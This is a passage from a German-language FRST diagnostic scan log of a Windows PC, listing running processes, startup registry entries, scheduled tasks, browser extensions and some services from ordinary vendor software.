(C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\Widgets.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.113\msedgewebview2.exe <6>
(C:\Users\skysc\Downloads\Neuer Ordner\FRST64 (1).exe ->) (Overwolf Ltd -> Overwolf LTD) C:\Program Files (x86)\Overwolf\Overwolf.exe
(explorer.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDrive.exe
(explorer.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Steam\steam.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <8>
(Opera Norway AS -> Opera Software) C:\Users\skysc\AppData\Local\Programs\Opera GX\109.0.5097.142\opera_autoupdate.exe <2>
(SearchFilterHost.exe ->) (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
(services.exe ->) (Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(services.exe ->) (Malwarebytes Inc. -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(services.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpDefenderCoreService.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MsMpEng.exe
(services.exe ->) (Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\NisSrv.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Case\MSI_Case_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Game Highlights\MSI_Companion_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI_Central_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LightKeeperService.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\Mystic_Light_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Service.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSIRegister\MSIRegisterService.exe
(services.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> MSI) C:\Program Files (x86)\MSI\MSI Center\Super Charger\MSI_Super_Charger_Service.exe
(services.exe ->) (NortonLifeLock Inc. -> NortonLifelock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\NortonSecurity.exe <2>
(services.exe ->) (NortonLifeLock Inc. -> NortonLifeLock Inc.) C:\Program Files\Norton Security\Engine\22.24.2.6\nsWscSvc.exe
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <3>
(services.exe ->) (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_493585427225c794\Display.NvContainer\NVDisplay.Container.exe <2>
(services.exe ->) (Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe
(services.exe ->) (Samsung Electronics CO., LTD. -> ) C:\Program Files\Samsung\Easy Connection to Screen\Service.exe
(services.exe ->) (Valve Corp. -> Valve Corporation) C:\Program Files (x86)\Common Files\Steam\steamservice.exe
(sihost.exe ->) (6099D0EF-9374-47ED-BDFE-A82136831235 -> File-New-Project) C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne\EarTrumpet\EarTrumpet.exe
(svchost.exe ->) (Brave Software, Inc. -> BraveSoftware Inc.) C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe <2>
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileCoAuth.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
(svchost.exe ->) (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\PowerToys\PowerToys.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_524.16300.20.0_x64__cw5n1h2txyewy\Dashboard\WidgetService.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\LocationNotificationWindows.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe <2>
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\UUS\Packages\Preview\amd64\MoUsoCoreWorker.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> ) C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\MSI.TerminalServer.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Speed Up\StorageMonitor.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.) C:\Program Files (x86)\MSI\MSI Center\True Color\New\MSI.True Color.exe
(svchost.exe ->) (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.) C:\Program Files (x86)\MSI\MSI Center\Voice Control\VoiceControl_Engine.exe
==================== Registry (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [RtkAudUService] => C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_1803724721d1a34c\RtkAudUService64.exe [1945544 2024-02-28] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [MSIRegister] => C:\Program Files (x86)\MSI\MSIRegister\MSIRegister.exe [1266864 2019-08-28] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [4407656 2024-07-17] (Valve Corp. -> Valve Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Stable] => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Opera GX Browser Assistant] => C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe [3291288 2021-02-01] (Opera Software AS -> Opera Software)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Overwolf] => C:\Program Files (x86)\Overwolf\OverwolfLauncher.exe [1832968 2024-07-23] (Overwolf Ltd -> Overwolf Ltd.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [EpicGamesLauncher] => C:\Program Files (x86)\Epic Games\Launcher\Portal\Binaries\Win64\EpicGamesLauncher.exe [37550568 2024-06-21] (Epic Games Inc. -> Epic Games, Inc.)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Discord] => C:\ProgramData\skysc\Discord\Update.exe [1525024 2023-11-06] (Discord Inc. -> GitHub)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [MicrosoftEdgeAutoLaunch_E457065EC9FFC031D52374F8B9832F00] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Run: [Lunar Client] => C:\Users\skysc\AppData\Local\Programs\launcher\Lunar Client.exe [176849464 2024-07-22] (Moonsworth, LLC -> Moonsworth LLC)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [MicrosoftEdgeAutoLaunch_B751ED54CA5804D0129CEDA4AA0FE63C] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 [3883472 2024-07-18] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-1221853621-2447620182-1933698513-1002\...\Run: [OneDrive] => C:\Program Files\Microsoft OneDrive\OneDrive.exe [4919312 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\127.0.6533.72\Installer\chrmstp.exe [2024-07-24] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\126.1.67.134\Installer\chrmstp.exe [2024-07-17] (Brave Software, Inc. -> Brave Software, Inc.)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {31A29B33-2F9D-4E5A-B113-C2F9AE0A2F8D} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore{DFB371DD-43E6-4228-ACFE-FADEACBD0C31} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {FFF40F90-C4A9-480F-AF6F-95D6FE70C03E} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA{A5CFE2E1-9623-44C3-B3C8-B178FBF5D7D2} => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {8FE0E829-5739-4830-B8A4-8EADE5477709} - System32\Tasks\GoogleSystem\GoogleUpdater\GoogleUpdaterTaskSystem128.0.6597.0{08699C9D-C6E5-410E-854E-9120298296B0} => C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe [4889704 2024-07-15] (Google LLC -> Google LLC)
Task: {C4F8F6AF-D8BB-46EB-BA88-43F5FDF7B4B3} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {506BA0A8-DADC-4595-B0DA-A7691B71C178} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23244744 2022-05-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {4EE6DC46-FA2C-42D4-A227-D1C2A6DDD040} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {56EC0CC9-972B-4DAD-9FA5-3B9402190B3A} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [115584 2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Task: {28ABD9F2-6737-46AD-8E0C-DDC433A2E213} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EF0A3A8E-574C-4DCB-BFF6-6812FDD96FDA} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {BF3E2465-DBAF-44DE-9296-EBE42160D27D} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {EEBEA335-5213-497F-BC43-9876DE8688BC} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\MpCmdRun.exe [1678960 2024-07-16] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {B0F24A60-5E79-4210-B730-A2F79708048A} - System32\Tasks\MSI Task Host - LEDKeeper2_Host => C:\Program Files (x86)\MSI\MSI Center\Mystic Light\LEDKeeper2.exe [2676840 2023-12-14] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star Int'l Co., Ltd.)
Task: {357123E4-3248-405C-B227-A69F3326D479} - System32\Tasks\MSI Task Host - MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Center\GameBar\MSI_GamebarTool.exe [81208 2021-09-27] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {AC26D83B-FCAF-453F-95DE-FE3F8465C2AA} - System32\Tasks\MSI Task Host - TraceFPS => C:\Program Files (x86)\MSI\MSI Center\GameBar\TraceFPS.exe [2780144 2021-01-25] (MICRO-STAR INTERNATIONAL CO., LTD. -> Copyright © 2020 Micro-Star INT'L CO., LTD.)
Task: {BE288D1C-D22E-4A65-B6A3-CE0B3052224E} - System32\Tasks\MSI_GamebarTool => C:\Program Files (x86)\MSI\MSI Companion\MSI_GamebarTool.exe [119392 2023-08-07] (MICRO-STAR INTERNATIONAL CO., LTD. -> )
Task: {1C40815B-A056-4AC2-A931-091E03CB0218} - System32\Tasks\MSI_Toast_Server => C:\Program Files (x86)\MSI\MSI Toast Server\MSIToastServer.exe [31904 2019-03-05] (MICRO-STAR INTERNATIONAL CO., LTD. -> Micro-Star INT'L CO., LTD.)
Task: {A45A8499-F30D-4F3E-B660-CB9196513923} - System32\Tasks\Norton 360\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {CA54FDB8-6128-47BD-A0ED-C9D0BBDC5708} - System32\Tasks\Norton 360\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {85460D07-DD81-48AC-9DB8-FAEDDD9E4A9C} - System32\Tasks\Norton 360\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.24.2.6\symerr.exe [379024 2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.)
Task: {0700D5B1-102A-4893-9ADA-7185056261A3} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.24.2.6\WSCStub.exe [646520 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
Task: {215D98A3-22CF-401A-B072-0FE3E4252469} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [1005096 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files\NVIDIA Corporation\NvContainer\-d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log
Task: {CB09D936-04C5-49C6-91A5-CD343A8088D7} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3345448 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6046E66B-556D-4BB5-96D7-FDFB29791D41} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [649256 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation) -> C:\Program Files (x86)\NVIDIA Corporation\NvNode\--launcher=TaskScheduler
Task: {95330FA2-42F5-4B9D-BCDD-CC2BC8E9858B} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFCC5B6E-BB1B-4CFD-B824-89EA3F22A919} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [910888 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {EFDA8A96-B078-491E-9E03-8E76DE56ABD2} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B0B1CF3B-E160-45F4-8767-2446FF93B44B} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {B43D8D56-45EB-4D1E-91B8-63CF957E1173} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {833377F9-8375-488D-9096-CF4605EB48C5} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1665064 2023-11-02] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {15469283-290A-4C91-A80D-973776316BD4} - System32\Tasks\OneDrive Per-Machine Standalone Update Task => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {54E56090-CE3D-4B15-A9F5-A7DA596CFE18} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1000 => C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe /reporting (Keine Datei)
Task: {3246FB24-FF9D-4B54-95BD-653EE03503A7} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1001 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {46979F62-4655-4018-955E-9BF1D88DDF97} - System32\Tasks\OneDrive Reporting Task-S-1-5-21-1221853621-2447620182-1933698513-1002 => C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe [4209168 2024-07-20] (Microsoft Corporation -> Microsoft Corporation)
Task: {64E3E2E2-E8DF-4744-BD6F-EF5E97162EE2} - System32\Tasks\Opera GX scheduled assistant Autoupdate 1693322873 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software) -> --scheduledautoupdate --component-name=assistant --component-path="C:\Users\skysc\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
Task: {CF648919-4154-44DE-BFE9-9DF87ED8EC9C} - System32\Tasks\Opera GX scheduled Autoupdate 1691520674 => C:\Users\skysc\AppData\Local\Programs\Opera GX\launcher.exe [2273696 2024-06-18] (Opera Norway AS -> Opera Software)
Task: {EBAC0C4B-4BF7-483A-BD3B-1E4EB3E0E848} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe [2370056 2024-07-23] (Overwolf Ltd -> Overwolf LTD) -> C:\Program Files (x86)\Overwolf\/RunningFrom Schedule
Task: {8306D461-C0F2-4929-9968-4BDBDFF98E88} - System32\Tasks\PowerToys\Autorun for skysc => C:\Program Files\PowerToys\PowerToys.exe [1194016 2024-05-26] (Microsoft Corporation -> Microsoft Corporation)
Task: {EDA296B7-700B-44AF-82EC-5530F81BED52} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360 for Gamers\Upgrade.exe [2353000 2024-03-04] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job => C:\Windows\explorer.exe
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Winsock: Catalog5 08 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 08 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{9d3406a1-6456-4e84-a9a3-a377cf7e7013}: [DhcpDomain] Speedport_W_724V_09011603_06_010
Edge:
=======
Edge DefaultProfile: Profile 1
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default [2024-07-19]
Edge NewTab: Default -> Active:"chrome-extension://fepbfegljfpfclgajmjlmnhdillncgke/newtabHTML.html"
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]
Edge Profile: C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1 [2024-07-24]
Edge HomePage: Profile 1 -> hxxp://www.google.com/
Edge DefaultSearchURL: Profile 1 -> hxxps://www.bing.com/search?PC=U523&q={searchTerms}
Edge Extension: (Microsoft Rewards) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\bnplfnhcidhhdapmblniehfaaompjlck [2024-07-19]
Edge Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-07-19]
Edge Extension: (Edge relevant text changes) - C:\Users\skysc\AppData\Local\Microsoft\Edge\User Data\Profile 1\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha [2024-07-19]
FireFox:
========
FF Plugin: @videolan.org/vlc,version=3.0.18 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.20 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2023-10-30] (VideoLAN -> VideoLAN)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2022-06-22] (Microsoft Corporation -> Microsoft Corporation)
Chrome:
=======
CHR Profile: C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default [2024-07-24]
CHR Extension: (Google Docs Offline) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2024-05-27]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\skysc\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2024-07-24]
Opera:
=======
StartMenuInternet: (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001) Opera GXStable - "C:\Users\skysc\AppData\Local\Programs\Opera GX\Launcher.exe"
Brave:
=======
BRA Profile: C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2024-07-23]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block First Party Filters (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\adcocjohghhfpidemphmcmlmhnfgikei [2024-07-20]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2024-07-20]
BRA Extension: (Brave NTP background images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2024-04-14]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bbefpembgddgdihpkcidgdgiojjlchji [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Fanboy's Mobile Notifications (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\bfpgedeaaibpoidldhjcknekahbikncb [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Cookie (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\cdbbhgbmjhfnhnmgeddbliobbofkgdhe [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Regional Catalog)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\gkboaolpopklhgplhaaiboijnklogmbc [2024-07-20]
BRA Extension: (Brave NTP Super Referrer mapping table) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\heplpbhjcbmiibdlchlanmdenffpiibo [2024-04-14]
BRA Extension: (Brave Ad Block Updater (Brave Ad Block Updater (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\iodkpdagapdfkphljnddpjlldadblomo [2024-07-20]
BRA Extension: (Brave Ads Resources) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\jcncoheihebhhiemmbmpfhkceomfipbj [2024-07-20]
BRA Extension: (Brave Ad Block Updater (EasyList Germany (plaintext))) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\lfmefmifdjlfneapckmpkinmlofjehbp [2024-07-20]
BRA Extension: (Brave Ad Block Updater (Resources)) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\mfddibmblmbccpadfndgakiopmmhebop [2024-07-20]
BRA Extension: (Brave NTP sponsored images) - C:\Users\skysc\AppData\Local\BraveSoftware\Brave-Browser\User Data\obbokncgfcbepeipkhpdepjjoncelefj [2024-07-20]
==================== Dienste (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [15772456 2023-12-03] (BattlEye Innovations e.K. -> )
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [166424 2024-04-14] (Brave Software, Inc. -> BraveSoftware Inc.)
